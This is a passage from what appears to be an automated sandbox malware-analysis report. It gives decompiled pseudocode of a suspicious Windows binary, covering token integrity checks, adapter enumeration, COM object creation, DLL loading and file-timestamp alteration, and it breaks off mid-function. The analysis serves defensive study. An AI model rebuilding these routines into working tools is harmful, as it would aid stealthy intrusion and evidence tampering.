                          • Instruction Fuzzy Hash: F2314871205311AFE7219F62DC09F2B7FA9FF84B50F00482EB948D22A0D770D805EBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (graph image not recoverable; basic blocks 5c3a80-5c3b2b call GetCurrentProcess, OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, EqualSid, FreeSid and CloseHandle)
                          C-Code - Quality: 100%
                          			E005C3A80() {
                          				void _v84;
                          				long _v88;
                          				short _v92;
                          				void* _v96;
                          				struct _SID_IDENTIFIER_AUTHORITY _v100;
                          				void* _t12;
                          				void* _t15;
                          				void* _t16;
                          				int _t21;
                          				HANDLE* _t27;
                          				int _t28;
                          				PSID* _t29;
                          
                          				_t29 =  &_v96;
                          				_t28 = 0;
                          				_t27 =  &_v100;
                          				 *_t27 = 0;
                          				_v88 = 0;
                          				 *_t29 = 0;
                          				_v92 =  *0x5d9a90 & 0x0000ffff;
                          				_t12 =  *0x5d9a8c; // 0x0
                          				_v96 = _t12;
                          				if(OpenProcessToken(GetCurrentProcess(), 8, _t27) != 0) {
                          					_t21 = GetTokenInformation(_v100.Value, 1,  &_v84, 0x4c,  &_v88); // executed
                          					if(_t21 != 0) {
                          						_t28 = 0;
                          						if(AllocateAndInitializeSid( &_v100, 1, 0x12, 0, 0, 0, 0, 0, 0, 0, _t29) != 0) {
                          							_t28 = EqualSid(_v88,  *_t29);
                          						}
                          					}
                          				}
                          				_t15 =  *_t29;
                          				if(_t15 != 0) {
                          					FreeSid(_t15);
                          				}
                          				_t16 = _v100;
                          				if(_t16 != 0) {
                          					CloseHandle(_t16); // executed
                          				}
                          				return _t28;
                          			}

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 005C3AA9
                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 005C3AB3
                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 005C3ACF
                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C3AEE
                          • EqualSid.ADVAPI32(?), ref: 005C3AFF
                          • FreeSid.ADVAPI32(00000000), ref: 005C3B0F
                          • CloseHandle.KERNELBASE(?), ref: 005C3B1E
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpen
                          • String ID:
                          • API String ID: 3347031116-0
                          • Opcode ID: 007636e409723d342e6ab4350af66615421bd9ed270c52b38df51125a944a3ee
                          • Instruction ID: 221f94ad6418038cff7061ea11fa03564278722e51368dd2f1f348ec03151e8b
                          • Opcode Fuzzy Hash: 007636e409723d342e6ab4350af66615421bd9ed270c52b38df51125a944a3ee
                          • Instruction Fuzzy Hash: DC110A71205311ABD7209F65DC49E5BBFECFB54B45F00881EB885D6190D670D908DB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 70%
                          			E005D6780(void* __ecx) {
                          				intOrPtr _t16;
                          				intOrPtr _t17;
                          				void* _t22;
                          				void* _t24;
                          				intOrPtr _t27;
                          				intOrPtr _t32;
                          				intOrPtr _t33;
                          				intOrPtr _t36;
                          				void* _t37;
                          				intOrPtr _t42;
                          				intOrPtr _t45;
                          				intOrPtr _t46;
                          				void* _t48;
                          				intOrPtr _t49;
                          				void* _t52;
                          				intOrPtr* _t53;
                          				intOrPtr* _t54;
                          				void* _t56;
                          				intOrPtr* _t57;
                          
                          				_t16 =  *0x5d9a88; // 0x282c70
                          				_t36 = 0;
                          				 *((intOrPtr*)(_t53 + 8)) = 0x280;
                          				 *_t53 = 0;
                          				 *((intOrPtr*)(_t53 + 4)) = 0;
                          				if(_t16 != 0) {
                          					E005C91E0(_t16);
                          					_t53 = _t53 + 4;
                          					 *0x5d9a88 = 0;
                          				}
                          				_t17 = E005C3180(0x280, 0);
                          				_t54 = _t53 + 8;
                          				_t49 = _t17;
                          				if(_t17 == 0) {
                          					_t45 = _t49;
                          					_t49 = 0;
                          					goto L14;
                          				} else {
                          					_t37 = _t54 + 8;
                          					_t22 =  *0x5d9f0c(_t49, _t37); // executed
                          					if(_t22 != 0x6f) {
                          						_t46 = _t49;
                          						L8:
                          						 *((intOrPtr*)(_t54 + 0xc)) = _t46;
                          						_t6 = _t46 + 8; // 0x8
                          						_push(0x800c);
                          						_push(_t54 + 4);
                          						_push(_t54);
                          						_push(0x194);
                          						_t24 = E005CF800();
                          						_t36 = 0;
                          						if(_t24 == 0) {
                          							L18:
                          							return _t36;
                          						}
                          						_t27 = E005C3180(2 +  *(_t54 + 4) * 4, 0);
                          						_t56 = _t54 + 8;
                          						 *0x5d9a88 = _t27;
                          						if(_t27 == 0) {
                          							goto L18;
                          						}
                          						_t38 = _t56 + 0x10;
                          						E005D4520(_t56 + 0x10, 0x9c);
                          						_t57 = _t56 + 8;
                          						_t52 = 0xffffffe0;
                          						_t48 = 0;
                          						do {
                          							_t42 =  *0x5d9a88; // 0x282c70
                          							E005D68E0(_t42 + _t48, 0x100, _t38,  *( *_t57 + _t52 + 0x20) & 0x000000ff);
                          							_t57 = _t57 + 0x10;
                          							_t48 = _t48 + 4;
                          							_t52 = _t52 + 1;
                          						} while (_t52 != 0);
                          						_t32 =  *0x5d9a88; // 0x282c70
                          						_t45 =  *((intOrPtr*)(_t57 + 0xc));
                          						_t36 = 1;
                          						 *((short*)(_t32 + 0x80)) = 0;
                          						L14:
                          						_t18 =  *_t54;
                          						if( *_t54 != 0) {
                          							E005C91E0(_t18);
                          							_t54 = _t54 + 4;
                          						}
                          						if(_t45 != 0) {
                          							E005C91E0(_t49);
                          						}
                          						goto L18;
                          					}
                          					_t33 = E005C3180( *((intOrPtr*)(_t54 + 0xc)), _t49);
                          					_t54 = _t54 + 8;
                          					_t45 = _t33;
                          					if(_t33 == 0) {
                          						_t49 = 0;
                          						_t36 = 0;
                          						goto L14;
                          					}
                          					 *0x5d9f0c(_t45, _t37);
                          					_t49 = _t45;
                          					goto L8;
                          				}
                          			}

                          APIs
                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005D67D4
                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005D67F8
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: AdaptersInfo$FreeHeap
                          • String ID: p,(
                          • API String ID: 1341788161-2805232150
                          • Opcode ID: a8977a800d28c782fbc4b24704f5d12a0a9f803390b27664f663fda3a9c4ed15
                          • Instruction ID: fe94079ddba525a76277085015964c51de726f10e1fe2b29392987ebc68cd0e5
                          • Opcode Fuzzy Hash: a8977a800d28c782fbc4b24704f5d12a0a9f803390b27664f663fda3a9c4ed15
                          • Instruction Fuzzy Hash: 6431A4B19043056FE7219B68AC8AF977BD8BF80344F15443FF84887341EA70D909D762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 34%
                          			E005C2DA0() {
                          				void* _t3;
                          				void* _t6;
                          				intOrPtr _t7;
                          				intOrPtr _t10;
                          				void* _t13;
                          				void* _t14;
                          
                          				if( *0x5d9bb8 != 0) {
                          					L2:
                          					if((GetVersion() & 0x000000fe) > 5) {
                          						_push(0x5d9aa8);
                          						_push(0x5d9b30);
                          						_push(1);
                          						_push(0);
                          						_push(0x5d9c0c); // executed
                          					} else {
                          						_push(0x5d9bf4);
                          						_push(0x5d9bd8);
                          						_push(1);
                          						_push(0);
                          						_push(0x5d9afc);
                          					}
                          					_t3 =  *0x5d9df0(); // executed
                          					_t13 = _t3;
                          					if(_t3 < 0) {
                          						_t12 = _t14;
                          						E005D4520(_t14, 0x30);
                          						E005D68E0( *0x5d9bb8, 0x200, _t12, _t13);
                          						_t6 = 0;
                          						_t10 = 0xffffffffffffffff;
                          					} else {
                          						_t10 = 1;
                          						_t6 = 1;
                          					}
                          					 *0x5d9bf8 = _t10;
                          					return _t6;
                          				}
                          				_t7 = E005C3180(0x400, 0);
                          				_t14 = _t14 + 8;
                          				 *0x5d9bb8 = _t7;
                          				if(_t7 == 0) {
                          					return 0;
                          				}
                          				goto L2;
                          			}

                          APIs
                          • GetVersion.KERNEL32 ref: 005C2DCD
                          • CoCreateInstance.OLE32(005D9C0C,00000000,00000001,005D9B30,005D9AA8), ref: 005C2E05
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                            • Part of subcall function 005D68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 005D6A15
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Heap$AllocateByteCharCreateInstanceMultiProcessVersionWide
                          • String ID:
                          • API String ID: 2686302260-0
                          • Opcode ID: 8df38b9135f17a425a438cfed16d69e7cec5063f2042957cdf8299fda2b694c9
                          • Instruction ID: 06b727c65622c27e27585ef75ff39d59b622deaa640109c5e29df0192c37402a
                          • Opcode Fuzzy Hash: 8df38b9135f17a425a438cfed16d69e7cec5063f2042957cdf8299fda2b694c9
                          • Instruction Fuzzy Hash: 2901D4317D93013BF7302AA8BC8BFA53E54B760B06F16402FF506F52D1E5A18445E256
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E005CC6D0(short* _a4) {
                          				struct _OBJDIR_INFORMATION _v12;
                          				short* _t8;
                          				long _t10;
                          				struct _EXCEPTION_RECORD _t12;
                          				UNICODE_STRING* _t14;
                          				struct _OBJDIR_INFORMATION _t15;
                          				HMODULE* _t16;
                          				short _t18;
                          
                          				_t16 =  &_v12;
                          				_t8 = _a4;
                          				 *_t16 = 0;
                          				_t12 = 0;
                          				if( *_t8 != 0) {
                          					do {
                          						_t18 =  *((short*)(_t8 + _t12 + 2));
                          						_t12 = _t12 + 2;
                          					} while (_t18 != 0);
                          				}
                          				_t14 =  &_v12;
                          				_t15 = 0;
                          				 *_t14 = _t12;
                          				 *((short*)(_t14 + 2)) = _t12 + 2;
                          				 *((intOrPtr*)(_t14 + 4)) = _t8;
                          				_t10 = LdrLoadDll(0, 0, _t14, _t16); // executed
                          				if(_t10 >= 0) {
                          					_t15 =  *_t16;
                          				}
                          				return _t15;
                          			}

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?), ref: 005CC70B
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2d4157f9cc6a385c7c92e2edb5a3eb94b38f14ad0fd97cb5411901b4d5e73740
                          • Instruction ID: 93c3ccf0c53adbc35e1128f3122d2fa59ef7761205321d98d7b644b46b84d6a4
                          • Opcode Fuzzy Hash: 2d4157f9cc6a385c7c92e2edb5a3eb94b38f14ad0fd97cb5411901b4d5e73740
                          • Instruction Fuzzy Hash: 14F082705042208FD324AF18D906B97FBF8FF45710F06C54DE4888B250E7759885CBE2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 25%
                          			E005C3200(signed int _a4, signed int _a8, signed int _a12) {
                          				void* _v16;
                          				void* _v20;
                          				char _v600;
                          				char _v612;
                          				char _v716;
                          				char _v764;
                          				struct _SECURITY_ATTRIBUTES* _v768;
                          				struct _SECURITY_ATTRIBUTES* _v772;
                          				signed int _v776;
                          				struct _SECURITY_ATTRIBUTES* _v780;
                          				struct _SECURITY_ATTRIBUTES* _v784;
                          				struct _SECURITY_ATTRIBUTES* _v788;
                          				struct _SECURITY_ATTRIBUTES* _v792;
                          				struct _SECURITY_ATTRIBUTES* _v796;
                          				struct _SECURITY_ATTRIBUTES* _v800;
                          				struct _SECURITY_ATTRIBUTES* _v804;
                          				struct _SECURITY_ATTRIBUTES* _v808;
                          				char _v812;
                          				struct _SECURITY_ATTRIBUTES* _v816;
                          				char _v820;
                          				WCHAR* _v824;
                          				char _v828;
                          				char _v832;
                          				intOrPtr _v912;
                          				char _v916;
                          				intOrPtr _v920;
                          				char _v924;
                          				signed int _v928;
                          				char _v932;
                          				long _v936;
                          				long _v940;
                          				intOrPtr _v944;
                          				intOrPtr _v948;
                          				intOrPtr _v952;
                          				void* _v956;
                          				intOrPtr _v960;
                          				struct _SECURITY_ATTRIBUTES* _v968;
                          				signed int _v972;
                          				intOrPtr _v976;
                          				intOrPtr _v980;
                          				WCHAR* _v984;
                          				char _v988;
                          				intOrPtr _v992;
                          				intOrPtr _v996;
                          				intOrPtr _v1000;
                          				char _v1004;
                          				intOrPtr _v1008;
                          				struct _SECURITY_ATTRIBUTES* _v1012;
                          				intOrPtr _v1016;
                          				intOrPtr* _v1020;
                          				signed int _v1024;
                          				char _v1028;
                          				intOrPtr _v1032;
                          				signed int _v1036;
                          				short _v1040;
                          				intOrPtr _v1044;
                          				char _v1048;
                          				intOrPtr _v1052;
                          				char _v1056;
                          				signed int _v1060;
                          				WCHAR* _v1064;
                          				intOrPtr _v1068;
                          				intOrPtr _v1072;
                          				intOrPtr _v1076;
                          				signed int _v1080;
                          				char _v1084;
                          				long _v1088;
                          				signed int _v1092;
                          				intOrPtr _v1096;
                          				signed int _v1100;
                          				intOrPtr _v1104;
                          				signed int _v1108;
                          				WCHAR* _v1112;
                          				intOrPtr _v1116;
                          				FILETIME* _v1120;
                          				void* _v1124;
                          				intOrPtr _v1128;
                          				intOrPtr _v1132;
                          				intOrPtr _v1136;
                          				signed int* _v1140;
                          				char _v1144;
                          				char _v1148;
                          				char _v1152;
                          				char _v1156;
                          				char _v1160;
                          				signed int _v1164;
                          				FILETIME* _v1168;
                          				void* _v1172;
                          				intOrPtr _v1176;
                          				intOrPtr _v1180;
                          				intOrPtr _v1184;
                          				signed int* _v1188;
                          				signed int _v1192;
                          				WCHAR* _v1196;
                          				intOrPtr _v1200;
                          				WCHAR* _v1204;
                          				intOrPtr _v1208;
                          				intOrPtr _v1212;
                          				intOrPtr* _v1216;
                          				intOrPtr* _v1224;
                          				char _v1228;
                          				signed int* _v1292;
                          				signed int* _v1296;
                          				intOrPtr _v1300;
                          				signed int _v1308;
                          				intOrPtr* _t281;
                          				signed int _t288;
                          				signed int _t291;
                          				signed int _t292;
                          				signed int _t293;
                          				intOrPtr* _t298;
                          				signed int _t299;
                          				void* _t300;
                          				signed int _t302;
                          				signed int _t314;
                          				void* _t315;
                          				signed int _t318;
                          				long _t325;
                          				long _t328;
                          				intOrPtr* _t333;
                          				intOrPtr _t335;
                          				signed int _t336;
                          				signed int _t338;
                          				signed int _t340;
                          				signed int _t349;
                          				signed int _t353;
                          				intOrPtr* _t369;
                          				void* _t371;
                          				signed int _t372;
                          				signed int _t374;
                          				signed int _t386;
                          				signed int _t387;
                          				signed int _t391;
                          				signed int _t392;
                          				signed int _t397;
                          				signed int _t398;
                          				signed int _t402;
                          				signed int _t403;
                          				void* _t410;
                          				void* _t412;
                          				signed int _t413;
                          				signed int _t415;
                          				signed int _t416;
                          				FILETIME* _t419;
                          				char* _t424;
                          				char* _t425;
                          				signed int _t426;
                          				FILETIME* _t441;
                          				signed int* _t464;
                          				signed int _t471;
                          				signed int _t472;
                          				signed int* _t473;
                          				intOrPtr* _t477;
                          				void* _t487;
                          				char* _t489;
                          				intOrPtr* _t491;
                          				intOrPtr* _t492;
                          				FILETIME* _t494;
                          				signed int _t497;
                          				signed int _t498;
                          				intOrPtr* _t499;
                          				signed int _t500;
                          				void* _t501;
                          				signed int _t503;
                          				intOrPtr* _t506;
                          				void* _t508;
                          				signed int* _t511;
                          				char* _t512;
                          				void* _t513;
                          				signed int _t514;
                          				signed int _t518;
                          				void* _t520;
                          				void* _t521;
                          				void* _t522;
                          				void* _t525;
                          				void* _t527;
                          				void* _t532;
                          
                          				if( *0x5d9aa8 != 0) {
                          					_t514 = _t518;
                          					_t520 = (_t518 & 0xfffffff8) - 0x3f0;
                          					_t281 =  *0x5d9aa8; // 0x628c60
                          					_v1012 = 0;
                          					_v956 = 0;
                          					_v968 = 0;
                          					_v812 = 0;
                          					_v816 = 0;
                          					_v820 = 0;
                          					_v824 = 0;
                          					_v764 = 0;
                          					_v768 = 0;
                          					_v772 = 0;
                          					_v776 = 0;
                          					_v780 = 0;
                          					_v784 = 0;
                          					_v788 = 0;
                          					_v792 = 0;
                          					_v796 = 0;
                          					_v800 = 0;
                          					_v804 = 0;
                          					_v808 = 0;
                          					_v1020 = _t281;
                          					_v1016 =  *_t281;
                          					_v988 = _v764;
                          					_v972 = _v776;
                          					_v992 = _v784;
                          					_v976 = _v792;
                          					_v996 = _v796;
                          					_v1000 = _v800;
                          					_v980 = _v808;
                          					_v1004 = _v812;
                          					_v1008 = _v816;
                          					_v984 = _v824;
                          					_t288 =  *((intOrPtr*)(_v1016 + 0x28))(_v1020, _v984, _v820, _v1008, _v1004, _v980, _v804, _v1000, _v996, _v976, _v788, _v992, _v780, _v972, _v772, _v768, _v988, _t501, _t487, _t410, _t513);
                          					__eflags = _t288;
                          					if(_t288 < 0) {
                          						_t503 = _t288;
                          						_t489 =  &_v600;
                          						_push(0x91);
                          						goto L29;
                          					} else {
                          						_t298 =  *0x5d9aa8; // 0x628c60
                          						_t299 =  *((intOrPtr*)( *_t298 + 0x1c))(_t298, 0,  &_v1080);
                          						__eflags = _t299;
                          						if(_t299 < 0) {
                          							_t503 = _t299;
                          							_t489 =  &_v612;
                          							_push(0x90);
                          							L29:
                          							_push(_t489);
                          							E005D4520();
                          							_t521 = _t520 + 8;
                          							_push(_t503);
                          							_push(_t489);
                          							goto L30;
                          						} else {
                          							_t505 = _a4;
                          							_t300 = E005C3240(_v1092, _a4, 0);
                          							_t522 = _t520 + 0xc;
                          							__eflags = _t300 - 0x3ff;
                          							if(_t300 > 0x3ff) {
                          								_t412 = 0;
                          								__eflags = 0;
                          								 *0x5d9bf8 = 3;
                          								goto L33;
                          							} else {
                          								_t302 = E005C26D0( &_v1048, 1, _t505);
                          								_t525 = _t522 + 0xc;
                          								__eflags = _t302;
                          								if(_t302 == 0) {
                          									_push(0x92);
                          									goto L42;
                          								} else {
                          									_t506 =  &_v612;
                          									E005D4520(_t506, 0x21);
                          									E005D4520( &_v812, 0x20);
                          									_t527 = _t525 + 0x10;
                          									_t415 =  *0x5d9de0;
                          									_t491 =  &_v832;
                          									_v1100 = _v1092;
                          									 *_t415(_t491);
                          									_v916 =  *((intOrPtr*)(_t491 + 8));
                          									_t492 =  &_v956;
                          									_v912 =  *((intOrPtr*)(_t491 + 0xc));
                          									_v924 =  *_t491;
                          									_v920 =  *((intOrPtr*)(_t491 + 4));
                          									 *_t415(_t492);
                          									_v1040 = 8;
                          									_v932 =  *((intOrPtr*)(_t492 + 0xc));
                          									_v940 =  *((intOrPtr*)(_t492 + 4));
                          									_v936 =  *(_t492 + 8);
                          									_v944 =  *_t492;
                          									_t314 =  *0x5d9dd4(_t506);
                          									__eflags = _t314;
                          									_v1036 = _t314;
                          									if(_t314 == 0) {
                          										L66:
                          										asm("int3");
                          										asm("int3");
                          										_push(_t514);
                          										_push(_t415);
                          										_push(_t492);
                          										_push(_t506);
                          										_t416 = 0;
                          										_t315 = CreateFileW(_v1112, 0x100, 1, 0, 3, 0, 0);
                          										__eflags = _t315 - 0xffffffff;
                          										if(_t315 != 0xffffffff) {
                          											_t471 = _a4;
                          											_t441 = 0;
                          											_t508 = _t315;
                          											_t494 = 0;
                          											__eflags = _t471;
                          											if(_t471 != 0) {
                          												_t494 =  &_v1148;
                          												_t328 = 0x989680 *  *_t471 + 0xd53e8000;
                          												__eflags = _t328;
                          												asm("adc edx, ebx");
                          												_t494->dwLowDateTime = _t328;
                          												_t494->dwHighDateTime = 0x989680 *  *_t471 >> 0x20;
                          											}
                          											_t472 = _a8;
                          											__eflags = _t472;
                          											if(_t472 != 0) {
                          												_t441 =  &_v1156;
                          												_t325 = 0x989680 *  *_t472 + 0xd53e8000;
                          												__eflags = _t325;
                          												asm("adc edx, ebx");
                          												_t441->dwLowDateTime = _t325;
                          												_t441->dwHighDateTime = 0x989680 *  *_t472 >> 0x20;
                          											}
                          											__eflags = _a12;
                          											if(_a12 == 0) {
                          												_t419 = 0;
                          												__eflags = 0;
                          											} else {
                          												_t473 = _a12;
                          												_v1168 = _t441;
                          												_v1172 = _t508;
                          												_t419 =  &_v1164;
                          												_t441 = _v1168;
                          												asm("adc edx, edi");
                          												_t508 = _v1172;
                          												_t419->dwLowDateTime = 0x989680 *  *_t473 + 0xd53e8000;
                          												_t419->dwHighDateTime = 0x989680 *  *_t473 >> 0x20;
                          											}
                          											_t318 = SetFileTime(_t508, _t494, _t441, _t419);
                          											__eflags = _t318;
                          											_t279 = _t318 != 0;
                          											__eflags = _t279;
                          											_t416 = 0 | _t279;
                          											CloseHandle(_t508);
                          										}
                          										return _t416;
                          									} else {
                          										_t415 = _v1060;
                          										_v968 = _v1032;
                          										_v976 = _v1040;
                          										_v972 = _v1036;
                          										_v980 = _v1044;
                          										_t333 = E005C5140(0xc);
                          										_t527 = _t527 + 4;
                          										_t506 = _t333;
                          										 *((intOrPtr*)(_t506 + 4)) = 0;
                          										 *(_t506 + 8) = 1;
                          										_t335 =  *0x5d9dd4(_t415);
                          										__eflags = _t415;
                          										 *_t506 = 0;
                          										if(_t415 == 0) {
                          											L11:
                          											_v1068 = _t335;
                          											_v1112 = _t506;
                          											_t336 = E005C5140(0xc);
                          											_t527 = _t527 + 4;
                          											 *(_t336 + 4) = 0;
                          											_t415 = _t336;
                          											 *(_t336 + 8) = 1;
                          											_t338 =  *0x5d9dd4( &_v828);
                          											__eflags = _t338;
                          											 *_t415 = _t338;
                          											if(__eflags == 0) {
                          												goto L66;
                          											} else {
                          												_t477 = _v1120;
                          												_v1076 =  *_t477;
                          												_v1108 = _v928;
                          												_v1060 = _v932;
                          												_v1088 = _v940;
                          												_v1092 = _v944;
                          												_v1096 = _v948;
                          												_v1080 = _v956;
                          												_v1100 = _v976;
                          												_v1104 = _v980;
                          												_v1084 = _v988;
                          												_v1064 = _v984;
                          												_t340 =  *((intOrPtr*)(_v1076 + 0x40))(_t477, _t338, _v1072, 6, _v1084, _v1064, _v1104, _v1100, _v1080, _v952, _v1096, _v1092, 5, _v1088, _v936, _v1060, _v1108,  &_v1056);
                          												asm("lock dec dword [ebx+0x8]");
                          												_t497 = _t340;
                          												_t511 = _v1188;
                          												if(__eflags == 0) {
                          													_t402 =  *_t415;
                          													__eflags = _t402;
                          													if(_t402 != 0) {
                          														 *0x5d9dd8(_t402);
                          														 *_t415 = 0;
                          													}
                          													_t403 =  *(_t415 + 4);
                          													__eflags = _t403;
                          													if(_t403 != 0) {
                          														L005D7400(_t403);
                          														_t527 = _t527 + 4;
                          													}
                          													L005D7400(_t415);
                          													_t527 = _t527 + 4;
                          												}
                          												asm("lock dec dword [esi+0x8]");
                          												_t424 =  &_v924;
                          												if(__eflags == 0) {
                          													_t397 =  *_t511;
                          													__eflags = _t397;
                          													if(_t397 != 0) {
                          														 *0x5d9dd8(_t397);
                          														 *_t511 = 0;
                          													}
                          													_t398 = _t511[1];
                          													__eflags = _t398;
                          													if(_t398 != 0) {
                          														L005D7400(_t398);
                          														_t527 = _t527 + 4;
                          													}
                          													L005D7400(_t511);
                          													_t527 = _t527 + 4;
                          												}
                          												_t506 =  *0x5d9ddc;
                          												 *_t506( &_v1124);
                          												 *_t506( &_v1048);
                          												 *_t506(_t424);
                          												__eflags = _t497;
                          												if(_t497 < 0) {
                          													__eflags = _t497 - 0x80070005;
                          													if(_t497 != 0x80070005) {
                          														_t512 =  &_v716;
                          														E005D4520( &_v716, 0x94);
                          														_t521 = _t527 + 8;
                          														_push(_t497);
                          														goto L63;
                          													} else {
                          														_t349 = E005C26D0( &_v1152, 0, _a4);
                          														_t525 = _t527 + 0xc;
                          														__eflags = _t349;
                          														if(_t349 == 0) {
                          															_push(0x93);
                          															L42:
                          															_push( *0x5d9bb8);
                          															E005D4520();
                          															_t522 = _t525 + 8;
                          															goto L31;
                          														} else {
                          															E005D4520( &_v916, 0x20);
                          															_v1204 = _v1196;
                          															_t353 =  *0x5d9de0;
                          															_t498 = _t353;
                          															 *_t353(_t424);
                          															_v1080 = _v928;
                          															_v1088 = _v936;
                          															_v1084 = _v932;
                          															_v1092 = _v940;
                          															 *_t498( &_v1060);
                          															_v1100 = _v1052;
                          															_v1108 = _v1060;
                          															_v1104 = _v1056;
                          															_v1112 = _v1064;
                          															 *_t498( &_v1144);
                          															_t415 = _v1164;
                          															_v1120 = _v1136;
                          															_v1128 = _v1144;
                          															_v1124 = _v1140;
                          															_v1132 = _v1148;
                          															_t369 = E005C5140(0xc);
                          															_t527 = _t525 + 0xc;
                          															_t492 = _t369;
                          															 *((intOrPtr*)(_t492 + 4)) = 0;
                          															 *(_t492 + 8) = 1;
                          															_t371 =  *0x5d9dd4(_t415);
                          															__eflags = _t415;
                          															_v1216 = _t492;
                          															 *_t492 = 0;
                          															if(_t415 == 0) {
                          																L47:
                          																_v1172 = _t371;
                          																_t372 = E005C5140(0xc);
                          																_t527 = _t527 + 4;
                          																 *(_t372 + 4) = 0;
                          																_t415 = _t372;
                          																 *(_t372 + 8) = 1;
                          																_t374 =  *0x5d9dd4( &_v932);
                          																__eflags = _t374;
                          																 *_t415 = _t374;
                          																if(__eflags == 0) {
                          																	goto L66;
                          																} else {
                          																	_t499 = _v1224;
                          																	_v1180 =  *_t499;
                          																	_v1212 = _v1096;
                          																	_v1164 = _v1100;
                          																	_v1192 = _v1108;
                          																	_v1196 = _v1112;
                          																	_v1200 = _v1116;
                          																	_v1184 = _v1124;
                          																	_v1168 = _v1120;
                          																	_v1204 = _v1128;
                          																	_v1208 = _v1132;
                          																	_v1188 = _v1140;
                          																	_v960 = _v1136;
                          																	_v1296 =  *((intOrPtr*)(_v1180 + 0x40))(_t499, _t374, _v1176, 6, _v1188, _v960, _v1208, _v1204, _v1184, _v1168, _v1200, _v1196, 3, _v1192, _v1104, _v1164, _v1212,  &_v1160);
                          																	asm("lock dec dword [ebx+0x8]");
                          																	if(__eflags == 0) {
                          																		_t391 =  *_t415;
                          																		__eflags = _t391;
                          																		if(_t391 != 0) {
                          																			 *0x5d9dd8(_t391);
                          																			 *_t415 = 0;
                          																		}
                          																		_t392 =  *(_t415 + 4);
                          																		__eflags = _t392;
                          																		if(_t392 != 0) {
                          																			L005D7400(_t392);
                          																			_t527 = _t527 + 4;
                          																		}
                          																		L005D7400(_t415);
                          																		_t527 = _t527 + 4;
                          																	}
                          																	_t464 = _v1292;
                          																	_t500 = _a4;
                          																	_t425 =  &_v1028;
                          																	asm("lock dec dword [ecx+0x8]");
                          																	if(__eflags == 0) {
                          																		_t386 =  *_t464;
                          																		__eflags = _t386;
                          																		if(_t386 != 0) {
                          																			 *0x5d9dd8(_t386);
                          																			_t464 = _v1296;
                          																			 *_t464 = 0;
                          																		}
                          																		_t387 = _t464[1];
                          																		__eflags = _t387;
                          																		if(_t387 != 0) {
                          																			L005D7400(_t387);
                          																			_t464 = _v1292;
                          																			_t527 = _t527 + 4;
                          																		}
                          																		L005D7400(_t464);
                          																		_t527 = _t527 + 4;
                          																	}
                          																	 *_t506( &_v1228);
                          																	 *_t506( &_v1152);
                          																	 *_t506(_t425);
                          																	_t426 = _v1308;
                          																	__eflags = _t426;
                          																	if(_t426 < 0) {
                          																		_t512 =  &_v820;
                          																		E005D4520( &_v820, 0x95);
                          																		_t521 = _t527 + 8;
                          																		_push(_t426);
                          																		L63:
                          																		_push(_t512);
                          																		L30:
                          																		_push(0x200);
                          																		_push( *0x5d9bb8);
                          																		E005D68E0();
                          																		_t522 = _t521 + 0x10;
                          																		L31:
                          																		_t412 = 0;
                          																		 *0x5d9bf8 = 2;
                          																		L33:
                          																		_t413 = _t412 + 1;
                          																		__eflags = _t413;
                          																	} else {
                          																		E005D4520( *0x5d9bb8, 0x65);
                          																		_t532 = _t527 + 8;
